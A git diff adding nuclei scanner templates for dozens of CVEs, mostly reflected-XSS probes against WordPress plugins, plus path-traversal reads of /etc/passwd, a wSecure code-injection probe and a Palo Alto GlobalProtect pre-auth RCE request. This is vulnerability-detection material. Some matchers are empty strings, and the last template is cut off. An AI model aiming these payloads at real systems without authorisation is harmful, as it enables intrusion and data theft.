diff --git a/README.md b/README.md
index b2ebc20708..b6fb139ccd 100644
--- a/README.md
+++ b/README.md
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves | 430 | vulnerabilities | 233 | exposed-panels | 200 |
-| takeovers | 70 | exposures | 116 | technologies | 120 |
+| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 |
+| takeovers | 70 | exposures | 116 | technologies | 125 |
| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 |
-| default-logins | 37 | file | 42 | dns | 10 |
+| default-logins | 44 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 9 | iot | 18 |
-**128 directories, 1551 files**.
+**134 directories, 1596 files**.
diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml
new file mode 100644
index 0000000000..f56848b401
--- /dev/null
+++ b/cves/2009/CVE-2009-1558.yaml
@@ -0,0 +1,24 @@
+id: CVE-2009-1558
+
+info:
+ name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
+ reference: https://www.exploit-db.com/exploits/32954
+ tags: cve,cve2009,iot,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml
new file mode 100644
index 0000000000..25c8832501
--- /dev/null
+++ b/cves/2012/CVE-2012-1835.yaml
@@ -0,0 +1,34 @@
+id: CVE-2012-1835
+
+info:
+ name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835
+ tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
+# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml
new file mode 100644
index 0000000000..d6883d7e82
--- /dev/null
+++ b/cves/2013/CVE-2013-3827.yaml
@@ -0,0 +1,38 @@
+id: CVE-2013-3827
+
+info:
+ name: Javafaces LFI
+ author: Random-Robbie
+ severity: medium
+ description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
+ tags: cve,cve2013,lfi,javafaces,oracle
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-3827
+ - https://www.exploit-db.com/exploits/38802
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml
new file mode 100644
index 0000000000..83fc34ed8d
--- /dev/null
+++ b/cves/2016/CVE-2016-1000128.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-1000128
+
+info:
+ name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml
new file mode 100644
index 0000000000..d76c910dcf
--- /dev/null
+++ b/cves/2016/CVE-2016-1000129.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000129
+
+info:
+ name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml
new file mode 100644
index 0000000000..36392e35d4
--- /dev/null
+++ b/cves/2016/CVE-2016-1000130.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000130
+
+info:
+ name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin e-search v1.0
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml
new file mode 100644
index 0000000000..1e540169b2
--- /dev/null
+++ b/cves/2016/CVE-2016-1000131.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-1000131
+
+info:
+ name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml
new file mode 100644
index 0000000000..e72ea63c7b
--- /dev/null
+++ b/cves/2016/CVE-2016-1000132.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000132
+
+info:
+ name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml
new file mode 100644
index 0000000000..658b8562e7
--- /dev/null
+++ b/cves/2016/CVE-2016-1000133.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000133
+
+info:
+ name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml
new file mode 100644
index 0000000000..1f35214f3d
--- /dev/null
+++ b/cves/2016/CVE-2016-1000134.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000134
+
+info:
+ name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin hdw-tube v1.2
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml
new file mode 100644
index 0000000000..ba16e3c957
--- /dev/null
+++ b/cves/2016/CVE-2016-1000135.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000135
+
+info:
+ name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin hdw-tube v1.2
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
new file mode 100644
index 0000000000..68f7e2616c
--- /dev/null
+++ b/cves/2016/CVE-2016-10960.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-10960
+
+info:
+ name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
+ author: daffainfo
+ severity: critical
+ description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
+ reference: |
+ - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
+ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
+ tags: cve,cve2016,wordpress,wp-plugin,rce
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
+ body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Nuclei: CVE-2016-10960"
+ condition: and
+ part: header
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml
index 45e7bfda4b..2d6bd7fbd0 100644
--- a/cves/2017/CVE-2017-15944.yaml
+++ b/cves/2017/CVE-2017-15944.yaml
@@ -2,23 +2,27 @@ id: CVE-2017-15944
info:
name: PreAuth RCE on Palo Alto GlobalProtect
- author: emadshanab
- reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
+ author: emadshanab,milo2012
+ reference: |
+ - https://www.exploit-db.com/exploits/43342
+ - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
severity: high
- tags: cve,cve2017,rce,vpn,paloalto
+ tags: cve,cve2017,rce,vpn,paloalto,globalprotect
requests:
- - method: GET
- path:
- - "{{BaseURL}}/global-protect/portal/css/login.css"
+ - raw:
+ - |
+ GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: PHPSESSID={{randstr}};
matchers-condition: and
matchers:
- type: word
words:
- - "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT"
- part: header
+ - "@start@Success@end@"
+ part: body
- type: status
status:
- - 200
+ - 200
\ No newline at end of file
diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml
new file mode 100644
index 0000000000..3d321b4c8f
--- /dev/null
+++ b/cves/2017/CVE-2017-17043.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-17043
+
+info:
+ name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml
new file mode 100644
index 0000000000..ecf71fafc7
--- /dev/null
+++ b/cves/2017/CVE-2017-17059.yaml
@@ -0,0 +1,34 @@
+id: CVE-2017-17059
+
+info:
+ name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
+ reference: |
+ - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
+
+ body: "amty_hidden=1"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml
new file mode 100644
index 0000000000..40a4e59745
--- /dev/null
+++ b/cves/2017/CVE-2017-17451.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-17451
+
+info:
+ name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml
new file mode 100644
index 0000000000..5ac65f849b
--- /dev/null
+++ b/cves/2017/CVE-2017-18536.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-18536
+
+info:
+ name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
+ reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml
new file mode 100644
index 0000000000..19bdc03839
--- /dev/null
+++ b/cves/2017/CVE-2017-9288.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-9288
+
+info:
+ name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml
new file mode 100644
index 0000000000..4f305a6330
--- /dev/null
+++ b/cves/2018/CVE-2018-11709.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-11709
+
+info:
+ name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml
new file mode 100644
index 0000000000..0fc4b182f1
--- /dev/null
+++ b/cves/2018/CVE-2018-12031.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-12031
+
+info:
+ name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
+ reference: |
+ - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-12031
+ - https://www.exploit-db.com/exploits/48614
+ tags: cve,cve2018,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[0*]:0:0"
+ - "\\[(font|extension|file)s\\]"
+ condition: or
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml
new file mode 100644
index 0000000000..79a0cbd39f
--- /dev/null
+++ b/cves/2018/CVE-2018-20462.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-20462
+
+info:
+ name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2018/CVE-2018-5316.yaml b/cves/2018/CVE-2018-5316.yaml
new file mode 100644
index 0000000000..7553a25625
--- /dev/null
+++ b/cves/2018/CVE-2018-5316.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-5316
+
+info:
+ name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml
new file mode 100644
index 0000000000..093014e337
--- /dev/null
+++ b/cves/2019/CVE-2019-12616.yaml
@@ -0,0 +1,29 @@
+id: CVE-2019-12616
+
+info:
+ name: phpMyAdmin CSRF
+ author: Mohammedsaneem
+ description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
+ severity: medium
+ tags: cve,cve2019,phpmyadmin,csrf
+ reference: |
+ - https://www.phpmyadmin.net/security/PMASA-2019-4/
+ - https://www.exploit-db.com/exploits/46982
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-12616
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/phpmyadmin/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "4.6.6deb4+deb9u2"
+ - "phpMyAdmin"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml
new file mode 100644
index 0000000000..55c9e48f5d
--- /dev/null
+++ b/cves/2019/CVE-2019-15713.yaml
@@ -0,0 +1,32 @@
+id: CVE-2019-15713
+
+info:
+ name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
+ reference: |
+ - https://wpscan.com/vulnerability/9267
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-15713
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "